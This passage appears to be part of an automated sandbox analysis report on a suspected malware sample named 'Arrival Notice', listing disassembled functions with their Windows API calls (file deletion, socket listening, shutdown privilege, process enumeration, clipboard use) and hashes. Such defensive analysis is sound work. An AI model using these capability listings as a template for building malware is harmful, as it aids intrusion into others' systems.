                  • Instruction Fuzzy Hash: E331DA316016296ADF14EFB5FC44ADF776CAF06320F584167E914E2290DB78DD45CA2C
                  Function 00428195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00428257
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00428267
                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00428273
                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00428310
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428324
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428356
                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0042838C
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00428395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CurrentDirectoryTime$File$Local$System
                  • String ID: *.*
                  • API String ID: 1464919966-438819550
                  • Opcode ID: 9704a876d3c43fdd3aea037f8011a810336c1b30e42b73a9fb6c255a6f0f03dc
                  • Instruction ID: f1fb5722247fd9d8ea42e6a4e3af54b1068ab5f9270e4799f4b1596115e78766
                  • Opcode Fuzzy Hash: 9704a876d3c43fdd3aea037f8011a810336c1b30e42b73a9fb6c255a6f0f03dc
                  • Instruction Fuzzy Hash: 6E616A726043159FCB10EF60D8809AFB3E8FF89314F44896EF98987251EB35E945CB96
                  Function 0041D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 0041D122
                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0041D1DD
                  • MoveFileW.KERNEL32(?,?), ref: 0041D1F0
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0041D20D
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0041D237
                    • Part of subcall function 0041D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0041D21C,?,?), ref: 0041D2B2
                  • FindClose.KERNEL32(00000000,?,?,?), ref: 0041D253
                  • FindClose.KERNEL32(00000000), ref: 0041D264
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                  • String ID: \*.*
                  • API String ID: 1946585618-1173974218
                  • Opcode ID: 80260f44b9f34b854aae93801cd6a825ba7cc957c3cf367275a5f213b3fd1a76
                  • Instruction ID: cbd148edaea074dafbe1c95e24bd6c40215c017d8db67fb928cbf558378c283c
                  • Opcode Fuzzy Hash: 80260f44b9f34b854aae93801cd6a825ba7cc957c3cf367275a5f213b3fd1a76
                  • Instruction Fuzzy Hash: DE618F71C0110DABCF06EBE0C992AEEB7B5AF15304F2441AAE502BB191EB345F49CB65
                  Function 0042ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                  • String ID:
                  • API String ID: 1737998785-0
                  • Opcode ID: 3350a9956213fb58508eab75518f12ec3bbe53a05acfaec0ae9e7874a62d2e9e
                  • Instruction ID: 0e3ced3f618b79905d6d8445a22256dde90084b05924d806dce700944ee8cf94
                  • Opcode Fuzzy Hash: 3350a9956213fb58508eab75518f12ec3bbe53a05acfaec0ae9e7874a62d2e9e
                  • Instruction Fuzzy Hash: 1641C0356056219FE320CF16E888B1ABBE5FF45318F59C0AAE4158F762C775EC42CB94
                  Function 0041E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041170D
                    • Part of subcall function 004116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041173A
                    • Part of subcall function 004116C3: GetLastError.KERNEL32 ref: 0041174A
                  • ExitWindowsEx.USER32(?,00000000), ref: 0041E932
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                  • String ID: $ $@$SeShutdownPrivilege
                  • API String ID: 2234035333-3163812486
                  • Opcode ID: 3d1546bbcc38ab9c473e579039b7697558b4aecc8ead145c7521646dcfc15b53
                  • Instruction ID: ee79e47083b1c775983bba966f6933b6b6a7c60515d32a94a0ad10ee507fa0ac
                  • Opcode Fuzzy Hash: 3d1546bbcc38ab9c473e579039b7697558b4aecc8ead145c7521646dcfc15b53
                  • Instruction Fuzzy Hash: E2012BBAA20311ABEB5427B69C86FFF725C9B08744F150427FD03E21D1D5AD5CC081AC
                  Function 00431204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                  Download Yara Rule
                  APIs
                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00431276
                  • WSAGetLastError.WSOCK32 ref: 00431283
                  • bind.WSOCK32(00000000,?,00000010), ref: 004312BA
                  • WSAGetLastError.WSOCK32 ref: 004312C5
                  • closesocket.WSOCK32(00000000), ref: 004312F4
                  • listen.WSOCK32(00000000,00000005), ref: 00431303
                  • WSAGetLastError.WSOCK32 ref: 0043130D
                  • closesocket.WSOCK32(00000000), ref: 0043133C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$closesocket$bindlistensocket
                  • String ID:
                  • API String ID: 540024437-0
                  • Opcode ID: 1bf26688f36e1cda1e7e1d932fdcbc9a8e99639afa262ba1ba108d71a06ed28a
                  • Instruction ID: cad02c8c18dad8e5f2d055b4a21936ce5223f4490618f1b79e4d440c71d3822d
                  • Opcode Fuzzy Hash: 1bf26688f36e1cda1e7e1d932fdcbc9a8e99639afa262ba1ba108d71a06ed28a
                  • Instruction Fuzzy Hash: 0241AF356001009FD710EF24C488B6AFBE5AF4A318F188099E8569F3A6C775EC82CBA5
                  Function 0041D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B3A97,?,?,003B2E7F,?,?,?,00000000), ref: 003B3AC2
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • FindFirstFileW.KERNEL32(?,?), ref: 0041D420
                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 0041D470
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0041D481
                  • FindClose.KERNEL32(00000000), ref: 0041D498
                  • FindClose.KERNEL32(00000000), ref: 0041D4A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                  • String ID: \*.*
                  • API String ID: 2649000838-1173974218
                  • Opcode ID: 986a72e7550b2a693df74138ee8c51e04fc531baf439e2710e6452b52a1861d1
                  • Instruction ID: 12c875e95133ea7b4cd923a243d273e9d52e72132d5fa05d5b594281ed203dea
                  • Opcode Fuzzy Hash: 986a72e7550b2a693df74138ee8c51e04fc531baf439e2710e6452b52a1861d1
                  • Instruction Fuzzy Hash: F531A071409345ABC301EF64C8919EFB7E8BE92308F444A2EF5D597291EB34AA09C767
                  Function 003EE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 0349abd4689c6afa2e2ddbf285ef4297922dff488d77c3bb6320d322ca3116e0
                  • Instruction ID: dde438bd53aa391ae51cd54b4e31961d62a8c88d3497e6be7de3e044d5247707
                  • Opcode Fuzzy Hash: 0349abd4689c6afa2e2ddbf285ef4297922dff488d77c3bb6320d322ca3116e0
                  • Instruction Fuzzy Hash: 11C25C72E046698FDB26CF29DD407EAB7B9EB44305F1542EAD40DE7281E774AE818F40
                  Function 0042648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 004264DC
                  • CoInitialize.OLE32(00000000), ref: 00426639
                  • CoCreateInstance.OLE32(0044FCF8,00000000,00000001,0044FB68,?), ref: 00426650
                  • CoUninitialize.OLE32 ref: 004268D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 886957087-24824748
                  • Opcode ID: 890f1b0574181a9a7c4246391111f074307055ea7c8b66b5329535f9ef15d16e
                  • Instruction ID: df8ed87ca02f5fd8271d9e7dee5c8264c5f84d995cbe28e20290c7e38f0f6641
                  • Opcode Fuzzy Hash: 890f1b0574181a9a7c4246391111f074307055ea7c8b66b5329535f9ef15d16e
                  • Instruction Fuzzy Hash: 31D15C71608311AFC315EF24D881AABB7E8FF94708F50496EF6958B291DB30ED45CB92
                  Function 004322DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32(?,?,00000000), ref: 004322E8
                    • Part of subcall function 0042E4EC: GetWindowRect.USER32(?,?), ref: 0042E504
                  • GetDesktopWindow.USER32 ref: 00432312
                  • GetWindowRect.USER32(00000000), ref: 00432319
                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00432355
                  • GetCursorPos.USER32(?), ref: 00432381
                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004323DF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                  • String ID:
                  • API String ID: 2387181109-0
                  • Opcode ID: 00e274a410b456be978134470f16c4c7dccc41475ef5d0a1bc083920fa111f5b
                  • Instruction ID: 83e31d72b56b74cf4f99253fe12c7070465d35eb5ecf4a557ad53bae420f5f5e
                  • Opcode Fuzzy Hash: 00e274a410b456be978134470f16c4c7dccc41475ef5d0a1bc083920fa111f5b
                  • Instruction Fuzzy Hash: 81312272505315AFD720DF25C844B9BB7A9FF88314F04091EF98597281CB78EA08CB9A
                  Function 00429B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00429B78
                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00429C8B
                    • Part of subcall function 00423874: GetInputState.USER32 ref: 004238CB
                    • Part of subcall function 00423874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00423966
                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00429BA8
                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00429C75
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                  • String ID: *.*
                  • API String ID: 1972594611-438819550
                  • Opcode ID: f415bb93fcb4581b57a749ee3fc77514e9fdc0e8fbaee4302da93e5dc58c1eff
                  • Instruction ID: 0c3609e125d4124389e0026401b9950331d06881be0898cf4367dca55920803f
                  • Opcode Fuzzy Hash: f415bb93fcb4581b57a749ee3fc77514e9fdc0e8fbaee4302da93e5dc58c1eff
                  • Instruction Fuzzy Hash: 76419071A00219AFDF15DF65D889AEE7BB8FF05300F64405BE905A6291EB349E84CF68
                  Function 003C997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C9A4E
                  • GetSysColor.USER32(0000000F), ref: 003C9B23
                  • SetBkColor.GDI32(?,00000000), ref: 003C9B36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Color$LongProcWindow
                  • String ID:
                  • API String ID: 3131106179-0
                  • Opcode ID: 01e0c2642b8196bf0191c12248fe3cd6277f8599e8a7c477b3b8cd3455c00a69
                  • Instruction ID: 44fa50d054867feeb716f7e8bc92c3aea30acceac76bf2db9b5d4e7aaeded010
                  • Opcode Fuzzy Hash: 01e0c2642b8196bf0191c12248fe3cd6277f8599e8a7c477b3b8cd3455c00a69
                  • Instruction Fuzzy Hash: 7FA12771508404BEE726AA2D8C8CF7F365DDB42354B17452FF002E6AD1CA39AD01D37A
                  Function 00431806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0043304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                    • Part of subcall function 0043304E: _wcslen.LIBCMT ref: 0043309B
                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0043185D
                  • WSAGetLastError.WSOCK32 ref: 00431884
                  • bind.WSOCK32(00000000,?,00000010), ref: 004318DB
                  • WSAGetLastError.WSOCK32 ref: 004318E6
                  • closesocket.WSOCK32(00000000), ref: 00431915
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 1601658205-0
                  • Opcode ID: 1944a2be2b193905ad380bf70f77c662b96ae48561ded3af2d7d1f764af7bd5b
                  • Instruction ID: 7db8ed3eb1b43f95b32ae4bc613a23a23ba4c37fa7bf79fe07365d1aa584a697
                  • Opcode Fuzzy Hash: 1944a2be2b193905ad380bf70f77c662b96ae48561ded3af2d7d1f764af7bd5b
                  • Instruction Fuzzy Hash: EF51C375A002009FD725AF24C886F6AB7E59B49718F08809DFA059F3D3C775AD418BA5
                  Function 00441C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                  • String ID:
                  • API String ID: 292994002-0
                  • Opcode ID: a56d761b57dd7711a4e9a793d3ef7bff55dfc458e470a7dfd1c7dc95f1971ebc
                  • Instruction ID: 226722e50d0a009361bb5904c82e422b0f60a869cbe6c54266e57d1d47956d98
                  • Opcode Fuzzy Hash: a56d761b57dd7711a4e9a793d3ef7bff55dfc458e470a7dfd1c7dc95f1971ebc
                  • Instruction Fuzzy Hash: 7F21B4317412115FF7208F1ADCC4B6B7BA5AF95315B19806AE8468B361C775EC82CB98
                  Function 003B8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                  • API String ID: 0-1546025612
                  • Opcode ID: d6d7d0a463d135e11bec660743dabb76e35c971a9260917f6a704cabe0dec6ab
                  • Instruction ID: 8c9ef91ba7df7a5be549381a873b9f73cefcbfe4756103d4fe9941fba2f29d97
                  • Opcode Fuzzy Hash: d6d7d0a463d135e11bec660743dabb76e35c971a9260917f6a704cabe0dec6ab
                  • Instruction Fuzzy Hash: 50A29E74A0021ECBDF26CF58C8417FDB7B5BF54318F2585AAEA15ABA84DB309D81CB50
                  Function 00418298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004182AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID: ($tbG$|
                  • API String ID: 1659193697-3186676182
                  • Opcode ID: 203f6f07306d752d8c9e52b3b66eedd8e442d321f765ca7610e22ae06a379063
                  • Instruction ID: b30025a40d0ab5f7c510db63c930d0f49e9d28de149a5e97a0331187bf4831e0
                  • Opcode Fuzzy Hash: 203f6f07306d752d8c9e52b3b66eedd8e442d321f765ca7610e22ae06a379063
                  • Instruction Fuzzy Hash: DF323974A007059FC728DF59C480AAAB7F1FF48710B15C56EE89ADB3A1EB74E981CB44
                  Function 0043A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0043A6AC
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0043A6BA
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • Process32NextW.KERNEL32(00000000,?), ref: 0043A79C
                  • CloseHandle.KERNEL32(00000000), ref: 0043A7AB
                    • Part of subcall function 003CCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,003F3303,?), ref: 003CCE8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                  • String ID:
                  • API String ID: 1991900642-0
                  • Opcode ID: 5697926021814662940ad451ad5f0fa0c8eee8e0051e48b2bad0834ecc5c65b5
                  • Instruction ID: 9cb9c2bb8b44dbf50f7706066715e76107102e54eee1193d6fd051aff8114f34
